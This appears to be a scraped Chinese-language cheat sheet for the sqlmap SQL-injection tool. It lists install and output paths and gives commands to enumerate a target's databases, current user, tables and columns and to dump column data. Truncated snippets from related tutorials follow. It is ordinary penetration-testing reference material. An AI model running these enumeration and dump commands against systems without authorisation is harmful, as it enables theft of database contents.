查詢sqlmap的位置:
locate sqlmap
sqlmap.py位置:
/usr/share/sqlmap/sqlmap.py
python sqlmap.py //呼叫python 程式解析sqlmap.py (sqlmap入口程式)
配置檔案:
/etc/sqlmap/sqlmap.conf
查詢記錄:
cd /root/.sqlmap/output/
sqlmap測試後歷史記錄存在此目錄,在下次測試前要刪除裡面的檔案,否則查詢出來的還是上次查詢過的內容
清除歷史記錄:
1.python sqlmap.py --purge
2.刪除/root/.sqlmap/output/ 檔案
支援的資料庫:
/usr/share/sqlmap/plugins/dbms
查詢所有的資料庫
sqlmap -u ip位址 --dbs
查詢現在所在的資料庫
sqlmap -u ip位址 --current-db
查詢使用者名稱
sqlmap -u ip位址 --current-user
查詢資料庫的表名
sqlmap -u ip位址 -d 資料庫名 --tables
查詢列名
sqlmap -u ip位址 -d 資料庫名 -t 表名 -c 列名
sqlmap簡單使用
u 檢測存在可利用漏洞 dbs 獲取所有庫 current db 列出當前資料庫 d 庫名 tables 查詢此庫中存在的表 d 庫名 t 表名 columns 列出表中的所有列 d 庫名 t 表名 c 列名1,列名2 dump 匯出列中的所有資料 sqlmap.py u url sqlmap.py...
sqlmap簡單的使用步驟
sqlmap用於 sqlmap是一款非常強大的開源sql自動化注入工具,可以用來檢測和利用sql注入漏洞。注意 sqlmap只是用來檢測和利用sql注入點的,使用前請先使用掃瞄工具掃出sql注入點。1 檢測注入 get注入 sqlmap u 預設使用level1檢測全部資料庫型別 sqlmap u ...
sqlmap簡單原理及使用
檢測注入 基本格式 sqlmap u 預設使用level1檢測全部資料庫型別 sqlmap u dbms mysql level 3 指定資料庫型別為mysql,級別為3 共5級,級別越高,檢測越全面 跟隨302跳轉 當注入頁面錯誤的時候,自動跳轉到另乙個頁面的時候需要跟隨302,當注入錯誤的時候,...